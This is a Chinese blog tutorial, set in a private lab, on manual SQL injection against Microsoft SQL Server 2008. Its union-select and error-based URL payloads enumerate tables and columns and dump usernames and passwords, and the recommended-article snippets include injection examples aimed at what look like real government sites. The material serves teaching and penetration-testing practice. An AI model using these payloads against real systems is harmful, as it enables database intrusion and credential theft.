利用mssql2008复现mssql手工注入原理

最新推荐文章于 2023-11-09 08:33:28 发布
最新推荐文章于 2023-11-09 08:33:28 发布
阅读量355 收藏 1
点赞数
分类专栏: web渗透测试心得 文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tempulcc/article/details/109217781
版权

MSSQL数据库

MSSQL数据库简介
MSSQL是指微软的SQL Server数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。属关系型数据库。

注入简介
MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路。
Microsoft SQL Sever 分为很多个版本,版本的不断的升级安全性也越来越高,对我们渗透过程中最喜欢的版本应该就是2008以前,在2008及其以后的版本数据库的权限已经不再是system,为了迎合新的版本我接下来的实验都在2008版本下面进行,同时也介绍以前可以利用的方法,相对于MySQL这个mssql显得重了许多,他众多的功能也给我们注入过程带来了便利,所以一般数据库为mssql支持多语句我们就考虑是不是应该直接拿下webshell。

对于mssql的一个注入点我们往往最关心的这个注入点的权限问题,是sa、db_owner还是public;其次是这个注点是否显错,注释语句是否可用,例如sql server中注释符“–”;还有就是注入点是什么类型的,是字符型注入,还是数字型注入。

默认库的介绍

master //用于记录所有SQL Server系统级别的信息,这些信息用于控制用户数据库和数据操作。
model //SQL Server为用户数据库提供的样板,新的用户数据库都以model数据库为基础
msdb //由 Enterprise Manager和Agent使用,记录着任务计划信息、事件处理信息、数据备份及恢复信息、警告及异常信息。
tempdb //它为临时表和其他临时工作提供了一个存储区。
在这里插入图片描述

这里我们经常要打交道的库也就是master,他储存了我们的所有数据库名等等,还有很多储存过程,所谓储存过程你可以把他理解成一个函数调用的过程。

储存过程是一个可编程的函数,它在数据库中创建并保存。它可以有SQL语句和一些特殊的控制结构组成。当希望在不同的应用程序或平台上执行相同的函数,或者封装特定功能时,存储过程是非常有用的。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式。

在这里插入图片描述
我们以master库为例可以看到上面几个东西,其中视图表master.dbo.sysdatabases储存所有数据库名,其他数据库的视图则储存他本库的表名与列名。

在这里插入图片描述
仔细研究,发现mssql中视图表中的information_schema表与mysql中的information_schema库类似,只不过mssql中的information_schema只存储当前数据库中用户表的内容,不包含系统表,也不能单独查询information_schema表
在这里插入图片描述
在这里插入图片描述
每一个库的视图表都有syscolumns存储着所有的字段,可编程性储存着我们的函数。

基本信息
@@version // 数据库版本
user //获取当前数据库用户名
db_name() // 当前数据库名 其中db_name(N)可以来遍历其他数据库
;select user //查询是否支持多语句
host_name() //服务端主机名

注入实例:

http://192.168.64.130:801/less-1.asp?id=-1' union select 1,2,3 --

在这里插入图片描述

http://192.168.64.130:801/less-1.asp?id=-1' union select top 1 1,@@version,3 --

在这里插入图片描述

http://192.168.64.130:801/less-1.asp?id=-1' union select top 1 1,@@version,user --

在这里插入图片描述

http://192.168.64.130:801/less-1.asp?id=-1’ union select 1,db_name(),user –
在这里插入图片描述

http://192.168.64.130:801/less-1.asp?id=-1' union select 1,host_name(),@@servername --

在这里插入图片描述
爆表名:
http://192.168.64.130:801/less-1.asp?id=-1%27%20and%201=(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27u%27)–
第一张表
在这里插入图片描述
第二张表:
http://192.168.64.130:801/less-1.asp?id=-1’ and 1=(select top 1 name from sysobjects where xtype=‘u’ and name <>‘emails’)–
在这里插入图片描述
或者使用not in
http://192.168.64.130:801/less-1.asp?id=-1’ and 1=(select top 1 name from sysobjects where xtype=‘u’ and name not in (‘emails’))–
或者!=
http://192.168.64.130:801/less-1.asp?id=-1’ and 1=(select top 1 name from sysobjects where xtype=‘u’ and name !=‘emails’)–

爆出全部表名为:emails、uagents、users、referers、sysdiagrams

爆列名:
http://192.168.64.130:801/less-1.asp?id=-1’ and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘users’) and name<>‘id’);–
在这里插入图片描述
http://192.168.64.130:801/less-1.asp?id=-1’ and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = ‘users’) and name not in (‘id’,‘username’ ))–
在这里插入图片描述
爆数据
http://192.168.64.130:801/less-1.asp?id=-1’ union select top 1 1,username,password from users –
在这里插入图片描述
http://192.168.64.130:801/less-1.asp?id=-1’ union select top 1 1,username,password from users where username <>‘Dumb’–
在这里插入图片描述
http://192.168.64.130:801/less-1.asp?id=-1’ union select top 1 1,username,password from users where username not in (‘Dumb’,‘Angelina’)–

tempulcc
关注
专栏目录
利用WebShell拿Shell技巧
悦分享
08-01 1978
webshell就是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php等后门文件与网站服务器WEB目录下正常的网页文件混在一起,可以使用浏览器来访问留下的后门,达到控制网站服务器的目的。shell的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。...
红队专题-Web安全/渗透测试-注入攻击
aming小老弟
10-27 180
Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞, 其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
收藏:SQL Server 2005|2008 SQL 注入
congyaguan5319的博客
02-13 143
收藏:SQL Server 2005 SQL 注入http://msdn.microsoft.com/zh-cn/library/ms161953(SQL.90).aspxSQL Server 2008 SQL 注入http:/...
sql server 2008 mysql 手工注入
03-25
本人原创 sql server 2008 mysql 手工注入 里面有源码和数据库文件 还有用于测试的项目
Sqlserver2008+搜索型注入技术
weixin_30659829的博客
01-23 123
简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。 然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'=',存在异同的话,就是100%有洞了。 我这里看出有上面说的洞后开始用nbsi来扫,...
SQL Server 2008,MySQL 5.1和Oracle 11g的sql注入详解
这里记录着我一点一滴的进步
01-15 824
SQL 注入原理 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 SQL 注入分类 1. 数字型注入 当输入的参数为整型时,则有可能存在数字型注入漏洞。 假设存在一条 URL 为:HTTP://www.aaa.com/t...
sql 2008注入经验
cnbird's blog
04-12 1385
select top 1 oid,name from(select top 1 oid,name from [active].[order] order by oid) t order by oid desc for xml raw   select%20top%201%20name%20from(select%20top%201%20name%20from%20[order]%20order
mssql手工注入
热门推荐
一个码农的笔记
10-11 1万+
报错注入: 例子:www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 【1】首先爆版本:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0 报错信息:在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1
mssql和mysql注入区别_Mssql手工注入小结
weixin_31623343的博客
02-01 566
前言:说起sql注入环境,网上流行的一些漏洞靶场基本上都是基于Mysql+Apache搭建的,所以我对mysql的手注及提权多多少少有一定的了解,但对mssql还很陌生,为了避免过度依赖sqlmap一把梭的尴尬局面,于是有了这篇文章。环境介绍:搭建环境:win7 + SQL Server 2008 R2 + IIS7.5win7开放1433端口sql server 2008 r2下载及搭建过程参考...
2023年网络安全岗面试跳槽看这一篇就够了(含面试题+大厂面经分享)
m0_71743066的博客
03-10 1503
又到了一年一度的金三银四面试季,想必有些朋友的心已经开始躁动了,毕竟跳槽涨薪的幅度远高于内部调薪的幅度!以下为网络安全各个方向涉及的面试题以及安全大厂的面经汇总,星数越多代表问题出现的几率越大,祝各位都能找到满意的工作。注:本套面试题及面经,已整理成pdf文档,但内容还在持续更新中,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺,希望对大家有帮助。
msSQL注入通杀 只要有注入点就有系统权限.rar
07-09
msSQL注入通杀,只要有注入点就有系统权限
红队系列-网络安全知识锦囊(持续更新)
最新发布
aming小老弟
11-09 982
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
SQL server 中的SQL 注入
d1996a的博客
09-27 405
SQL server 中的sql注入 实验环境: 在windows server 2008虚拟机中安装SQL server 数据库。安装phpstudy ,通过一台Windows7 访问连接windows server 2008. SQL server 联合注入 首先判断注入点,输入id=1,页面正常回显。 首先判断是否是数值型: id=1 and 1=1,页面正常回显 id=1 and 1=2,页面空显示,可以判断是数值型。 因为有显示位,可以用联合注入进行注入。 首先判断显示位,由此可以看出显示位
Sql serversql注入
chinaherolts2008的博客
07-27 220
SQL Injection 关于sqlsql教程入的危害java基础教程在这里python基础教程就不多做c#教程介绍了,相信vb.net教程大家也知道其中的厉害关系。有一些sql注入的事件大家感兴趣可以看一下 防范sql注入的方法无非有以下几种: 1.使用类型安全的SQL参数 2.使用参数化输入存储过程 3.使用参数集合与动态SQL 4.输入滤波 5.过滤LIKE条款的特殊字符 ...如果有遗漏的也欢迎园子的大大们指教。 Sample: var Shipcity; ShipCity =
SQLServer数据库注入测试
Jietewang的博客
04-11 1056
Part one:How phpstudy connects to SQL Server 2008 总结一下:使用PHPstudy集成环境中的php5.4.45连接SQL server 2008相关坑点。 在百度上能搜索到的大部份方法都是有效的,但是如果你是一个运气不太好的新手的话估计就要耗费你太多的精力。 首先需要明白的是Windows下的安装的PHPstudy集成环境是不能直接使用PHP连接数据库SQL Server 2008。这本身就是一个很恼火的事情,随着时代的进步,科技的发展,现在的人儿啊尽
个人学习笔记之手工注入测试(Microsoft SQL Server
weixin_44926231的博客
06-28 1055
个人学习笔记之手工注入测试(Microsoft SQL Server) 启动环境:https://www.mozhe.cn/bug/detail/90 找到注入点 http://219.153.49.228:41537/new_list.asp?id=2-0 返回正常 http://219.153.49.228:41537/new_list.asp?id=2‘ 报错 判断字段 http:...
渗透测试学习 九、 MSsql注入
weixin_30788239的博客
04-26 604
MSsql注入漏洞详解 (Asp、Aspx站,常见于棋牌网站、考试网站、大学网站、政府网站、游戏网站、OA办公系统) 大纲:msSQL数据库调用分析  msSQL注入原理  msSQL注入另类玩法   msSQL数据库介绍及操作   介绍:ms SQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据...
mssql报错注入原理及流程实例
buffedon的博客
05-19 1190
mssql报错注入原理及流程实例mssql 报错注入1. 原理2. mssql 测试实例2.1 找注入点2.2 判断类型2.3 获取信息获取数据库的数量获取数据库名获取表名获取列名获取列中的值 mssql 报错注入 1. 原理 在MSSQL中,数据类型不一样(例如1=‘1’)会报错,并且报错信息会在日志信息中显示出来;日志文件直接在网页上显示 利用原理,进行构造 1=‘mssql语句’,返回报错信息 2. mssql 测试实例 2.1 找注入sql注入漏洞一般都在输入框,搜索框,域名地址
MsSQL手工注入攻防指南
"MsSQL手工注入是针对Microsoft SQL Server数据库的一种攻击方式,通过构造特定的SQL语句,尝试获取系统信息、权限验证或执行非法操作。这种攻击通常利用了应用程序中不安全的输入处理,使得攻击者能够绕过正常的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值